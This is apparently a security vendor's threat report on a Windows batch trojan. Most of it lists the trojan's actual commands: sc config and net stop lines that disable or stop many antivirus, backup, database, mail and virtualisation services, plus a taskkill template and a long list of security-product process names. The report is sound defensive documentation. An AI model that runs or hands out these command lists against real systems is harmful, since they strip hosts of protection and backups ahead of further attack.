Trojan.BAT.STARTER.TIAOOAAZ
PLATFORM:
Windows
OVERALL RISK RATING:
DAMAGE POTENTIAL:
DISTRIBUTION POTENTIAL:
REPORTED INFECTION:
INFORMATION EXPOSURE:
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
Infection Channel: Downloaded from the Internet
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It disables antivirus services. This is done to allow this malware to perform its routines, avoiding removal from the system.
TECHNICAL DETAILS
File Size: 47,932 bytes
File Type: BAT
Memory Resident: No
Initial Samples Received Date: 28 May 2020
Payload: Disables services
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan adds the following processes:
- Disable the following anti-virus and anti-malware related services:
- sc config aswBcc start= disabled
- sc config bedbg start= disabled
- sc config ccEvtMgr start= disabled
- sc config ccSetMgr start= disabled
- sc config EhttpSrv start= disabled
- sc config ekrn start= disabled
- sc config EPIntegrationService start= disable
- sc config EPProtectedService start= disable
- sc config epredline start= disable
- sc config EPUpdateServicestart= disabled
- sc config EPUpdateService start= disabled
- sc config EPUpdateService start= disable
- sc config ESHASRV start= disabled
- sc config macmnsvc start= disabled
- sc config masvc start= disabled
- sc config McTaskManager start= disabled
- sc config mfefire start= disabled
- sc config mfevtp start= disabled
- sc config mfewc start= disabled
- sc config ntrtscan start= disabled
- sc config SAVService start= disabled
- sc config SepMasterService start= disabled
- sc config SepMasterServiceMig start= disabled
- sc config Smcinst start= disabled
- sc config SntpService start= disabled
- sc config svcGenericHost start= disabled
- sc config swi_filter start= disabled
- sc config swi_service start= disabled
- sc config swi_update start= disabled
- sc config swi_update_64 start= disabled
- sc config Symantec start= disabled
- sc config "Symantec System Recovery" start= disabled
- sc config TmCCSF start= disabled
- sc config TmPfw start= disable
- sc config TrueKeyScheduler start= disabled
- sc config TrueKeyServiceHelper start= disabled
- sc config WdNisSvc start= disabled
- Disable other services:
- sc config "Acronis VSS Provider" start= disabled
- sc config AcronisAgent start= disabled
- sc config AcrSch2Svc start= disabled
- sc config AdobeARMservice start= disabled
- sc config Alerter start= disabled
- sc config ARSM start= disabled
- sc config avbackup start= disabled
- sc config BackupExecAgentAccelerator start= disabled
- sc config BackupExecAgentBrowser start= disabled
- sc config BackupExecDeviceMediaService start= disabled
- sc config BackupExecJobEngine start= disabled
- sc config BackupExecManagementService start= disabled
- sc config BackupExecRPCService start= disabled
- sc config BackupExecVSSProvider start= disabled
- sc config bcrservice start= disabled
- sc config BITSstart= disabled
- sc config BlueStripeCollector start= disabled
- sc config BrokerInfrastructurestart= disabled
- sc config Cissesrv start= disabled
- sc config CpqRcmc3 start= disabled
- sc config CSAdmin start= disabled
- sc config CSAuth start= disabled
- sc config CSDbSync start= disabled
- sc config CSLog start= disabled
- sc config CSMon start= disabled
- sc config CSRadius start= disabled
- sc config CSTacacs start= disabled
- sc config DB2 start= disabled
- sc config DB2-0 start= disabled
- sc config DB2DAS00 start= disabled
- sc config DB2GOVERNOR_DB2COPY1 start= disabled
- sc config DB2INST2 start= disabled
- sc config DB2LICD_DB2COPY1 start= disabled
- sc config DB2MGMTSVC_DB2COPY1 start= disabled
- sc config DB2REMOTECMD_DB2COPY1 start= disabled
- sc config DCAgent start= disabled
- sc config "Enterprise Client Service" start= disabled
- sc config epag start= disable
- sc config EPSecurityServicestart= disabled
- sc config EPSecurityService start= disabled
- sc config EPSecurityService start= disable
- sc config EraserSvc11710 start= disabled
- sc config ERSvc start= disabled
- sc config EsgShKernel start= disabled
- sc config Eventlog start= disabled
- sc config FA_Scheduler start= disabled
- sc config GoogleChromeElevationService start= disabled
- sc config gupdate start= disabled
- sc config gupdatem start= disabled
- sc config HealthService start= disabled
- sc config IBMDataServerMgr start= disabled
- sc config IBMDSServer41 start= disabled
- sc config IDriverT start= disabled
- sc config IISAdmin start= disabled
- sc config IMAP4Svc start= disabled
- sc config ImapiService start= disabled
- sc config klnagent start= disabled
- sc config LogProcessorService start= disabled
- sc config LRSDRVX start= disabled
- sc config MBAMService start= disabled
- sc config MBEndpointAgent start= disabled
- sc config McShield start= disabled
- sc config mfemms start= disabled
- sc config MMS start= disabled
- sc config mozyprobackup start= disabled
- sc config MsDtsServer start= disabled
- sc config MsDtsServer100 start= disabled
- sc config MsDtsServer110 start= disabled
- sc config MsDtsServer130 start= disabled
- sc config MSExchangeES start= disabled
- sc config MSExchangeIS start= disabled
- sc config MSExchangeMGMT start= disabled
- sc config MSExchangeMTA start= disabled
- sc config MSExchangeSA start= disabled
- sc config MSExchangeSRS start= disabled
- sc config msftesql$PROD start= disabled
- sc config MSMQ start= disabled
- sc config MSOLAP$SQL_2008 start= disabled
- sc config MSOLAP$SYSTEM_BGC start= disabled
- sc config MSOLAP$TPS start= disabled
- sc config MSOLAP$TPSAMA start= disabled
- sc config MSSQL$BKUPEXEC start= disabled
- sc config MSSQL$CITRIX_METAFRAME start= disabled
- sc config MSSQL$ECWDB2 start= disabled
- sc config MSSQL$EPOSERVER start= disabled
- sc config MSSQL$ITRIS start= disabled
- sc config MSSQL$NET2 start= disabled
- sc config MSSQL$PRACTICEMGT start= disabled
- sc config MSSQL$PRACTTICEBGC start= disabled
- sc config MSSQL$PROD start= disabled
- sc config MSSQL$PROFXENGAGEMENT start= disabled
- sc config MSSQL$SBSMONITORING start= disabled
- sc config MSSQL$SHAREPOINT start= disabled
- sc config MSSQL$SQL_2008 start= disabled
- sc config MSSQL$SQLEXPRESS start= disabled
- sc config MSSQL$SYSTEM_BGC start= disabled
- sc config MSSQL$TPS start= disabled
- sc config MSSQL$TPSAMA start= disabled
- sc config MSSQL$VEEAMSQL2008R2 start= disabled
- sc config MSSQL$VEEAMSQL2012 start= disabled
- sc config MSSQLFDLauncher start= disabled
- sc config MSSQLFDLauncher$ITRIS start= disabled
- sc config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
- sc config MSSQLFDLauncher$SBSMONITORING start= disabled
- sc config MSSQLFDLauncher$SHAREPOINT start= disabled
- sc config MSSQLFDLauncher$SQL_2008 start= disabled
- sc config MSSQLFDLauncher$SYSTEM_BGC start= disabled
- sc config MSSQLFDLauncher$TPS start= disabled
- sc config MSSQLFDLauncher$TPSAMA start= disabled
- sc config MSSQLLaunchpad$ITRIS start= disabled
- sc config MSSQLSERVER start= disabled
- sc config MSSQLServerADHelper start= disabled
- sc config MSSQLServerADHelper100 start= disabled
- sc config MSSQLServerOLAPService start= disabled
- sc config msvsmon90 start= disabled
- sc config MySQL57 start= disabled
- sc config Net2ClientSvc start= disabled
- sc config NetDDE start= disabled
- sc config NetMsmqActivator start= disabled
- sc config NetSvc start= disabled
- sc config NimbusWatcherService start= disabled
- sc config NtLmSsp start= disabled
- sc config NtmsSvc start= disabled
- sc config odserv start= disabled
- sc config OracleClientCache80 start= disabled
- sc config ose start= disabled
- sc config PDVFSService start= disabled
- sc config POP3Svc start= disabled
- sc config ProLiantMonitor start= disabled
- sc config ReportServer start= disabled
- sc config ReportServer$SQL_2008 start= disabled
- sc config ReportServer$SYSTEM_BGC start= disabled
- sc config ReportServer$TPS start= disabled
- sc config ReportServer$TPSAMA start= disabled
- sc config RESvc start= disabled
- sc config RSCDsvc start= disabled
- sc config sacsvr start= disabled
- sc config SamSs start= disabled
- sc config SDD_Service start= disabled
- sc config SDRSVC start= disabled
- sc config SentinelAgent start= disabled
- sc config SentinelHelperService start= disabled
- sc config SentinelStaticEngine start= disabled
- sc config ShMonitor start= disabled
- sc config SmcService start= disabled
- sc config SMTPSvc start= disabled
- sc config SNAC start= disabled
- sc config SnowInventoryClient start= disabled
- sc config "SQL Backups" start= disabled
- sc config SQLAgent$BKUPEXEC start= disabled
- sc config SQLAgent$CITRIX_METAFRAME start= disabled
- sc config SQLAgent$CXDB start= disabled
- sc config SQLAgent$ECWDB2 start= disabled
- sc config SQLAgent$EPOSERVER start= disabled
- sc config SQLAgent$ITRIS start= disabled
- sc config SQLAgent$NET2 start= disabled
- sc config SQLAgent$PRACTTICEBGC start= disabled
- sc config SQLAgent$PRACTTICEMGT start= disabled
- sc config SQLAgent$PROD start= disabled
- sc config SQLAgent$PROFXENGAGEMENT start= disabled
- sc config SQLAgent$SBSMONITORING start= disabled
- sc config SQLAgent$SHAREPOINT start= disabled
- sc config SQLAgent$SQL_2008 start= disabled
- sc config SQLAgent$SQLEXPRESS start= disabled
- sc config SQLAgent$SYSTEM_BGC start= disabled
- sc config SQLAgent$TPS start= disabled
- sc config SQLAgent$TPSAMA start= disabled
- sc config SQLAgent$VEEAMSQL2008R2 start= disabled
- sc config SQLAgent$VEEAMSQL2012 start= disabled
- sc config SQLBrowser start= disabled
- sc config "SQLsafe Backup Service" start= disabled
- sc config "SQLsafe Filter Service" start= disabled
- sc config SQLSafeOLRService start= disabled
- sc config SQLSERVERAGENT start= disabled
- sc config SQLTELEMETRY start= disabled
- sc config SQLTELEMETRY$ECWDB2 start= disabled
- sc config SQLTELEMETRY$ITRIS start= disabled
- sc config SQLWriter start= disabled
- sc config SSISTELEMETRY130 start= disabled
- sc config SstpSvc start= disabled
- sc config sysdown start= disabled
- sc config System start= disabled
- sc config Telemetryserver start= disabled
- sc config TlntSvr start= disabled
- sc config tmlisten start= disabled
- sc config tpautoconnsvc start= disabled
- sc config TPAutoConnSvc start= disabled
- sc config TPVCGateway start= disabled
- sc config TrueKey start= disabled
- sc config TSM start= disabled
- sc config UI0Detect start= disabled
- sc config "Veeam Backup Catalog Data Service" start= disabled
- sc config VeeamBackupSvc start= disabled
- sc config VeeamBrokerSvc start= disabled
- sc config VeeamCatalogSvc start= disabled
- sc config VeeamCloudSvc start= disabled
- sc config VeeamDeploymentService start= disabled
- sc config VeeamDeploySvc start= disabled
- sc config VeeamEnterpriseManagerSvc start= disabled
- sc config VeeamHvIntegrationSvc start= disabled
- sc config VeeamMountSvc start= disabled
- sc config VeeamNFSSvc start= disabled
- sc config VeeamRESTSvc start= disabled
- sc config VeeamTransportSvc start= disabled
- sc config VGAuthService start= disabled
- sc config VMTools start= disabled
- sc config VMware start= disabled
- sc config VMwareCAFCommAmqpListener start= disabled
- sc config VMwareCAFManagementAgentHost start= disabled
- sc config vmware-converter-agent start= disabled
- sc config vmware-converter-server start= disabled
- sc config vmware-converter-worker start= disabled
- sc config W3Svc start= disabled
- sc config wbengine start= disabled
- sc config WebClient start= disabled
- sc config WinDefend start= disabled
- sc config WinVNC4 start= disabled
- sc config WRSVC start= disabled
- sc config "Zoolz 2 Service" start= disabled
- Terminate services:
- net stop "Acronis VSS Provider" /y
- net stop AcrSch2Svc /y
- net stop AdobeARMservice /y
- net stop Alerter /y
- net stop ARSM /y
- net stop avbackup /y
- net stop BackupExecAgentAccelerator /y
- net stop BackupExecAgentBrowser /y
- net stop BackupExecDeviceMediaService /y
- net stop BackupExecJobEngine /y
- net stop BackupExecManagementService /y
- net stop BackupExecVSSProvider /y
- net stop bcrservice /y
- net stop bedbg /y
- net stop BITS /y
- net stop BlueStripeCollector /y
- net stop BrokerInfrastructure /y
- net stop Cissesrv /y
- net stop CpqRcmc3 /y
- net stop CSAdmin /y
- net stop CSAuth /y
- net stop CSDbSync /y
- net stop CSLog /y
- net stop CSMon /y
- net stop CSRadius /y
- net stop CSTacacs /y
- net stop DB2 /y
- net stop DB2-0 /y
- net stop DB2DAS00 /y
- net stop DB2GOVERNOR_DB2COPY1 /y
- net stop DB2INST2 /y
- net stop DB2LICD_DB2COPY1 /y
- net stop DB2MGMTSVC_DB2COPY1 /y
- net stop DB2REMOTECMD_DB2COPY1 /y
- net stop DCAgent /y
- net stop "Enterprise Client Service" /y
- net stop epag /y
- net stop epredline /y
- net stop EraserSvc11710 /y
- net stop ERSvc /y
- net stop EsgShKernel /y
- net stop Eventlog /y
- net stop GoogleChromeElevationService /y
- net stop gupdate /y
- net stop gupdatem /y
- net stop HealthService /y
- net stop IBMDataServerMgr /y
- net stop IBMDSServer41 /y
- net stop IISAdmin /y
- net stop IMAP4Svc /y
- net stop ImapiService /y
- net stop LogProcessorService /y
- net stop LRSDRVX /y
- net stop MBEndpointAgent /y
- net stop McTaskManager /y
- net stop MMS /y
- net stop mozyprobackup /y
- net stop MsDtsServer /y
- net stop MsDtsServer100 /y
- net stop MsDtsServer110 /y
- net stop MsDtsServer130 /y
- net stop MSExchangeES /y
- net stop MSExchangeIS /y
- net stop MSExchangeMGMT /y
- net stop MSExchangeMTA /y
- net stop MSExchangeSA /y
- net stop MSExchangeSRS /y
- net stop msftesql$PROD /y
- net stop MSMQ /y
- net stop MSOLAP$SQL_2008 /y
- net stop MSOLAP$SYSTEM_BGC /y
- net stop MSOLAP$TPS /y
- net stop MSOLAP$TPSAMA /y
- net stop MSSQL$BKUPEXEC /y
- net stop MSSQL$CITRIX_METAFRAME /y
- net stop MSSQL$ECWDB2 /y
- net stop MSSQL$EPOSERVER /y
- net stop MSSQL$ITRIS /y
- net stop MSSQL$NET2 /y
- net stop MSSQL$PRACTICEMGT /y
- net stop MSSQL$PRACTTICEBGC /y
- net stop MSSQL$PROD /y
- net stop MSSQL$PROFXENGAGEMENT /y
- net stop MSSQL$SBSMONITORING /y
- net stop MSSQL$SHAREPOINT /y
- net stop MSSQL$SQL_2008 /y
- net stop MSSQL$SQLEXPRESS /y
- net stop MSSQL$SYSTEM_BGC /y
- net stop MSSQL$TPS /y
- net stop MSSQL$TPSAMA /y
- net stop MSSQL$VEEAMSQL2008R2 /y
- net stop MSSQL$VEEAMSQL2012 /y
- net stop MSSQLFDLauncher /y
- net stop MSSQLFDLauncher$ITRIS /y
- net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
- net stop MSSQLFDLauncher$SBSMONITORING /y
- net stop MSSQLFDLauncher$SHAREPOINT /y
- net stop MSSQLFDLauncher$SQL_2008 /y
- net stop MSSQLFDLauncher$SYSTEM_BGC /y
- net stop MSSQLFDLauncher$TPS /y
- net stop MSSQLFDLauncher$TPSAMA /y
- net stop MSSQLLaunchpad$ITRIS /y
- net stop MSSQLSERVER /y
- net stop MSSQLServerADHelper /y
- net stop MSSQLServerADHelper100 /y
- net stop MSSQLServerOLAPService /y
- net stop msvsmon90 /y
- net stop MySQL57 /y
- net stop Net2ClientSvc /y
- net stop NetDDE /y
- net stop NetMsmqActivator /y
- net stop NetSvc /y
- net stop NimbusWatcherService /y
- net stop NtLmSsp /y
- net stop NtmsSvc /y
- net stop odserv /y
- net stop OracleClientCache80 /y
- net stop ose /y
- net stop PDVFSService /y
- net stop POP3Svc /y
- net stop ProLiantMonitor /y
- net stop ReportServer /y
- net stop ReportServer$SQL_2008 /y
- net stop ReportServer$SYSTEM_BGC /y
- net stop ReportServer$TPS /y
- net stop ReportServer$TPSAMA /y
- net stop RESvc /y
- net stop RSCDsvc /y
- net stop sacsvr /y
- net stop SamSs /y
- net stop SAVService /y
- net stop SDD_Service /y
- net stop SDRSVC /y
- net stop SentinelAgent /y
- net stop SentinelHelperService /y
- net stop SentinelStaticEngine /y
- net stop ShMonitor /y
- net stop SmcService /y
- net stop SMTPSvc /y
- net stop SnowInventoryClient /y
- net stop "SQL Backups" /y
- net stop SQLAgent$BKUPEXEC /y
- net stop SQLAgent$CITRIX_METAFRAME /y
- net stop SQLAgent$CXDB /y
- net stop SQLAgent$ECWDB2 /y
- net stop SQLAgent$EPOSERVER /y
- net stop SQLAgent$ITRIS /y
- net stop SQLAgent$NET2 /y
- net stop SQLAgent$PRACTTICEBGC /y
- net stop SQLAgent$PRACTTICEMGT /y
- net stop SQLAgent$PROD /y
- net stop SQLAgent$PROFXENGAGEMENT /y
- net stop SQLAgent$SBSMONITORING /y
- net stop SQLAgent$SHAREPOINT /y
- net stop SQLAgent$SQL_2008 /y
- net stop SQLAgent$SQLEXPRESS /y
- net stop SQLAgent$SYSTEM_BGC /y
- net stop SQLAgent$TPS /y
- net stop SQLAgent$TPSAMA /y
- net stop SQLAgent$VEEAMSQL2008R2 /y
- net stop SQLAgent$VEEAMSQL2012 /y
- net stop SQLBrowser /y
- net stop "SQLsafe Backup Service" /y
- net stop "SQLsafe Filter Service" /y
- net stop SQLSafeOLRService /y
- net stop SQLSERVERAGENT /y
- net stop SQLTELEMETRY /y
- net stop SQLTELEMETRY$ECWDB2 /y
- net stop SQLTELEMETRY$ITRIS /y
- net stop SQLWriter /y
- net stop SSISTELEMETRY130 /y
- net stop SstpSvc /y
- net stop sysdown /y
- net stop System /y
- net stop Telemetryserver /y
- net stop TlntSvr /y
- net stop tpautoconnsvc /y
- net stop TPAutoConnSvc /y
- net stop TPVCGateway /y
- net stop TrueKey /y
- net stop TrueKeyScheduler /y
- net stop TrueKeyServiceHelper /y
- net stop TSM /y
- net stop UI0Detect /y
- net stop "Veeam Backup Catalog Data Service" /y
- net stop VeeamBackupSvc /y
- net stop VeeamBrokerSvc /y
- net stop VeeamCatalogSvc /y
- net stop VeeamCloudSvc /y
- net stop VeeamDeploymentService /y
- net stop VeeamDeploySvc /y
- net stop VeeamEnterpriseManagerSvc /y
- net stop VeeamHvIntegrationSvc /y
- net stop VeeamMountSvc /y
- net stop VeeamNFSSvc /y
- net stop VeeamRESTSvc /y
- net stop VeeamTransportSvc /y
- net stop VGAuthService /y
- net stop VMTools /y
- net stop VMware /y
- net stop VMwareCAFCommAmqpListener /y
- net stop VMwareCAFManagementAgentHost /y
- net stop vmware-converter-agent /y
- net stop vmware-converter-server /y
- net stop vmware-converter-worker /y
- net stop W3Svc /y
- net stop wbengine /y
- net stop WebClient /y
- net stop WinVNC4 /y
- net stop WRSVC /y
- net stop "Zoolz 2 Service" /y
- taskkill /im {Process Name} /f -Terminate anti-virus and anti-malware related processes, where {Process Name} can be any of the following:
- a2service.exe
- a2start.exe
- aawservice.exe
- acaas.exe
- acaegmgr.exe
- acaif.exe
- acais.exe
- acctmgr.exe
- ad-aware2007.exe
- administrator.exe
- adminserver.exe
- aflogvw.exe
- afwserv.exe
- ahnrpt.exe
- ahnsd.exe
- ahnsdsv.exe
- alert.exe
- alertsvc.exe
- almon.exe
- alogserv.exe
- alsvc.exe
- alunotify.exe
- alupdate.exe
- aluschedulersvc.exe
- amswmagt
- aphost.exe
- appsvc32.exe
- aps.exe
- apvxdwin.exe
- ashbug.exe
- ashchest.exe
- ashcmd.exe
- ashdisp.exe
- ashenhcd.exe
- ashlogv.exe
- ashmaisv.exe
- ashpopwz.exe
- ashquick.exe
- ashserv.exe
- ashsimp2.exe
- ashsimpl.exe
- ashskpcc.exe
- ashskpck.exe
- ashupd.exe
- ashwebsv.exe
- asupport.exe
- aswdisp.exe
- aswregsvr.exe
- aswserv.exe
- aswupdsv.exe
- aswwebsv.exe
- atwsctsk.exe
- aupdrun.exe
- aus.exe
- auth8021x.exe
- autoup.exe
- avcenter.exe
- avconfig.exe
- avconsol.exe
- avengine.exe
- avesvc.exe
- avfwsvc.exe
- avkproxy.exe
- avkservice.exe
- avktray.exe
- avkwctl.exe
- avltmain.exe
- avmailc.exe
- avmcdlg.exe
- avnotify.exe
- avscan.exe
- avserver.exe
- avshadow.exe
- avsynmgr.exe
- avtask.exe
- avwebgrd.exe
- bavtray.exe
- bdagent.exe
- bdc.exe
- bdlite.exe
- bdmcon.exe
- bdredline.exe
- bdss.exe
- bdsubmit.exe
- bhipssvc.exe
- bka.exe
- blackd.exe
- blackice.exe
- blupro.exe
- bmrt.exe
- bwgo0000
- ca.exe
- caantispyware.exe
- caav.exe
- caavcmdscan.exe
- caavguiscan.exe
- caf.exe
- cafw.exe
- caissdt.exe
- calogdump.exe
- capfaem.exe
- capfasem.exe
- capfsem.exe
- capmuamagt.exe
- cappactiveprotection.ex
- casc.exe
- casecuritycenter.exe
- caunst.exe
- cavrep.exe
- cavrid.exe
- cavscan.exe
- cavtray.exe
- ccap.exe
- ccapp.exe
- ccemflsv.exe
- ccenter.exe
- ccevtmgr.exe
- cclaw.exe
- ccnfagent.exe
- ccprovsp.exe
- ccproxy.exe
- ccpxysvc.exe
- ccschedulersvc.exe
- ccsetmgr.exe
- ccsmagtd.exe
- ccsvchst.exe
- ccsystemreport.exe
- cctray.exe
- ccupdate.exe
- certificationmanagerser
- cfftplugin.exe
- cfnotsrvd.exe
- cfp.exe
- cfpconfg.exe
- cfpconfig.exe
- cfplogvw.exe
- cfpsbmit.exe
- cfpupdat.exe
- cfsmsmd.exe
- checkup.exe
- cis.exe
- cistray.exe
- cka.exe
- clamscan.exe
- clamtray.exe
- clamwin.exe
- clps.exe
- clpsla.exe
- clpsls.exe
- clshield.exe
- cmdagent.exe
- cmdinstall.exe
- cmgrdian.exe
- cntaosmgr.exe
- comhost.exe
- console.exe
- coreframeworkhost.exe /
- coreserviceshell.exe
- cpd.exe
- cpdclnt.exe
- cpf.exe
- cpntsrv.exe
- cramtray.exe
- crashrep.exe
- crdm.exe
- crssvc.exe
- csacontrol.exe
- csadmin.exe
- csauth.exe
- csfalconservice.exe
- csinject.exe
- csinsm32.exe
- csinsmnt.exe
- cssauth.exe
- cylancesvc.exe
- cylanceui.exe
- dao_log.exe
- dbserv.exe
- dbsrv9.exe
- defwatch
- defwatch.exe
- deloeminfs.exe
- deteqt.agent.exe
- diskmon.exe
- djsnetcn.exe
- dlservice.exe
- doscan.exe
- dpmra.exe
- dr_serviceengine.exe
- drwagntd.exe
- drwagnui.exe
- drweb.exe
- drweb32.exe
- drweb32w.exe
- drweb386.exe
- drwebcgp.exe
- drwebcom.exe
- drwebdc.exe
- drwebmng.exe
- drwebscd.exe
- drwebupw.exe
- drwebwcl.exe
- drwebwin.exe
- drwinst.exe
- drwupgrade.exe
- dwarkdaemon.exe
- dwengine.exe
- dwhwizrd.exe
- dwnetfilter.exe
- dwwin.exe
- edisk.exe
- eeyeevnt.exe
- egui.exe
- ehttpsrv.exe
- ekrn.exe
- elogsvc.exe
- emlibupdateagentnt.exe
- emlproui.exe
- emlproxy.exe
- endpointsecurity.exe
- engineserver.exe
- entitymain.exe
- era.exe
- esecagntservice.exe
- esecservice.exe
- esmagent.exe
- etagent.exe
- etconsole3.exe
- etcorrel.exe
- etloganalyzer.exe
- etreporter.exe
- etrssfeeds.exe
- etscheduler.exe
- etwcontrolpanel.exe
- euqmonitor.exe
- eventparser.exe
- evtarmgr.exe
- evtmgr.exe
- evtprocessecfile.exe
- ewidoctrl.exe
- fameh32.exe
- fcappdb.exe
- fcdblog.exe
- fch32.exe
- fchelper64.exe
- fcsms.exe
- fcssas.exe
- fih32.exe
- firesvc.exe
- firetray.exe
- firewallgui.exe
- fmon.exe
- forcefield.exe
- fpavserver.exe
- fprottray.exe
- frameworkservic
- frameworkservic.exe
- frameworkservice.exe
- fsaa.exe
- fsaua.exe
- fsav32.exe
- fsavgui.exe
- fscuif.exe
- fsdfwd.exe
- fsgk32.exe
- fsgk32st.exe
- fsguidll.exe
- fsguiexe.exe
- fshdll32.exe
- fshoster32.exe
- fshoster64.exe
- fsm32.exe
- fsma32.exe
- fsmb32.exe
- fsorsp.exe
- fspc.exe
- fspex.exe
- fsqh.exe
- fssm32.exe
- fwcfg.exe
- fwinst.exe
- fws.exe
- gcascleaner.exe
- gcasdtserv.exe
- gcasinstallhelper.exe /
- gcasnotice.exe
- gcasserv.exe
- gcasservalert.exe
- gcasswupdater.exe
- gdfirewalltray.exe
- gdfwsvc.exe
- gdscan.exe
- gfireporterservice.exe
- ghost_2.exe
- ghosttray.exe
- giantantispywaremain.ex
- giantantispywareupdater
- gziface.exe
- gzserv.exe
- hwapi.exe
- icepack.exe
- idsinst.exe
- iface.exe
- igateway.exe
- inicio.exe
- inonmsrv.exe
- inorpc.exe
- inort.exe
- inotask.exe
- inoweb.exe
- isafe.exe
- isafinst.exe
- isntsmtp.exe
- isntsysmonitor
- ispwdsvc.exe
- isscsf.exe
- issdaemon.exe
- issvc.exe
- isuac.exe
- iswmgr.exe
- itmrt_supportdiagnostic
- itmrt_trace.exe
- itmrtsvc.exe
- ixaptsvc.exe
- ixavsvc.exe
- ixfwsvc.exe
- kabackreport.exe
- kaccore.exe
- kanmcmain.exe
- kansgui.exe
- kansvr.exe
- kis.exe
- kislive.exe
- kissvc.exe
- klnacserver.exe
- klnagent.exe
- klserver.exe
- klswd.exe
- klwtblfs.exe
- kmailmon.exe
- knownsvr.exe
- knupdatemain.exe
- kpf4gui.exe
- kpf4ss.exe
- kpfw32.exe
- kpfwsvc.exe
- krbcc32s.exe
- kswebshield.exe
- kvdetech.exe
- kvmonxp.kxp
- kvmonxp_2.kxp
- kvolself.exe
- kvsrvxp.exe
- kvsrvxp_1.exe
- kvxp.kxp
- kwatch.exe
- kwsprod.exe
- kxeserv.exe
- leventmgr.exe
- livesrv.exe
- lmon.exe
- log_qtine.exe
- loggingserver.exe
- luall.exe
- lucallbackproxy.exe
- lucoms.exe
- lucoms~1.exe
- lucomserver.exe
- lwdmserver.exe
- macmnsvc.exe
- macompatsvc.exe
- mantispm.exe
- masalert.exe
- massrv.exe
- masvc.exe
- mbamservice.exe
- mbamtray.exe
- mcagent.exe
- mcapexe.exe
- mcappins.exe
- mcconsol.exe
- mcdash.exe
- mcdetect.exe
- mcepoc.exe
- mcepocfg.exe
- mcinfo.exe
- mcmnhdlr.exe
- mcmscsvc.exe
- mcnasvc.exe
- mcods.exe
- mcpalmcfg.exe
- mcpromgr.exe
- mcproxy.exe
- mcregwiz.exe
- mcsacore.exe
- mcscript_inuse.exe
- mcshell.exe
- mcshield.exe
- mcshld9x.exe
- mcsvhost.exe
- mcsysmon.exe
- mctray.exe
- mctskshd.exe
- mcui32.exe
- mcuimgr.exe
- mcupdate.exe
- mcupdmgr.exe
- mcvsftsn.exe
- mcvsrte.exe
- mcvsshld.exe
- mcwce.exe
- mcwcecfg.exe
- mfeann.exe
- mfecanary.exe
- mfeesp.exe
- mfefire.exe
- mfefw.exe
- mfehcs.exe
- mfemactl.exe
- mfemms.exe
- mfetp.exe
- mfevtps.exe
- mfewc.exe
- mfewch.exe
- mgavrtcl.exe
- mghtml.exe
- mgntsvc.exe
- monsvcnt.exe
- monsysnt.exe
- mpcmdrun.exe
- mpf.exe
- mpfagent.exe
- mpfconsole.exe
- mpfservice.exe
- mpfsrv.exe
- mpftray.exe
- mps.exe
- mpsevh.exe
- mpsvc.exe
- mrf.exe
- msascui.exe
- mscifapp.exe
- mskagent.exe
- mskdetct.exe
- msksrver.exe
- msksrvr.exe
- msmpeng.exe
- msscli.exe
- msseces.exe
- msssrv.exe
- myagttry.exe
- nailgpip.exe
- naprdmgr.exe
- navectrl.exe
- navelog.exe
- navesp.exe
- navshcom.exe
- navw32.exe
- navwnt.exe
- ncdaemon.exe
- ndetect.exe
- neotrace.exe
- netcfg.exe
- networkagent.exe
- ngctw32.exe
- ngserver.exe
- nip.exe
- nipsvc.exe
- nisoptui.exe
- nisserv.exe
- nissrv.exe
- nisum.exe
- njeeves.exe
- nmain.exe
- nortonsecurity.exe
- npfmntor.exe
- npfmsg.exe
- npfmsg2.exe
- npfsvice.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nrmenctb.exe
- nscsrvce.exe
- nsctop.exe
- nsmdemf.exe
- nsmdmon.exe
- nsmdreal.exe
- nsmdsch.exe
- nsmdtr.exe
- ntrtscan.exe
- nvcoas.exe
- nvcsched.exe
- nymse.exe
- oasclnt.exe
- oespamtest.exe
- ofcdog.exe
- ofcpfwsvc.exe
- okclient.exe
- olfsnt40.exe
- onlinent.exe
- onlnsvc.exe
- op_viewer.exe
- opscan.exe
- outpost.exe
- padfsvr.exe
- pagent.exe
- pagentwd.exe
- pasystemtray.exe
- pavbckpt.exe
- pavfires.exe
- pavfnsvr.exe
- pavjobs.exe
- pavkre.exe
- pavmail.exe
- pavreport.exe
- pavsched.exe
- pavsrv50.exe
- pavsrv51.exe
- pavsrv52.exe
- pavupg.exe
- pccclient.exe
- pccguide.exe
- pcclient.exe
- pccnt.exe
- pccntmon.exe
- pccntupd.exe
- pccpfw.exe
- pcctlcom.exe
- pcscan.exe
- pcscnsrv.exe
- pctsauxs.exe
- pctsgui.exe
- pctssvc.exe
- pctstray.exe
- pep.exe
- persfw.exe
- pnmsrv.exe
- pntiomon.exe
- pop3pack.exe
- pop3trap.exe
- poproxy.exe
- ppclean.exe
- ppctlpriv.exe
- ppppwallrun.exe
- pqibrowser.exe
- pqv2isvc.exe
- prevsrv.exe
- privacyiconclient.exe
- proutil.exe
- psanhost.exe
- psctris.exe
- psctrls.exe
- psh_svc.exe
- pshost.exe
- psimreal.exe
- psimsvc.exe
- pskmssvc.exe
- psuamain.exe
- psuaservice.exe
- pxemtftp.exe
- pxeservice.exe
- qclean.exe
- qdcsfs.exe
- qoeloader.exe
- qserver.exe
- rapapp.exe
- ras.exe
- rasupd.exe
- rav.exe
- ravmon.exe
- ravmond.exe
- ravservice.exe
- ravstub.exe
- ravtask.exe
- ravtray.exe
- ravupdate.exe
- ravxp.exe
- rcsvcmon.exe
- redirsvc.exe
- regmech.exe
- remupd.exe
- reportersvc.exe
- reportsvc.exe
- retinaengine.exe
- rfwmain.exe
- rfwproxy.exe
- rfwsrv.exe
- rfwstub.exe
- rnav.exe
- rnreport.exe
- routernt.exe
- rpcserv.exe
- rsnetsvr.exe
- rstray.exe
- rtvscan.exe
- rulaunch.exe
- safeservice.exe
- sahookmain.exe
- saservice.exe
- sav32cli.exe
- savfmsectrl.exe
- savfmselog.exe
- savfmsesjm.exe
- savfmsesp.exe
- savfmsespamstatsmanager.exe
- savfmsesrv.exe
- savfmsetask.exe
- savfmseui.exe
- savmain.exe
- savroam.exe
- savscan.exe
- savservice.exe
- savui.exe
- sbserv.exe
- scan32.exe
- scanexplicit.exe
- scanfrm.exe
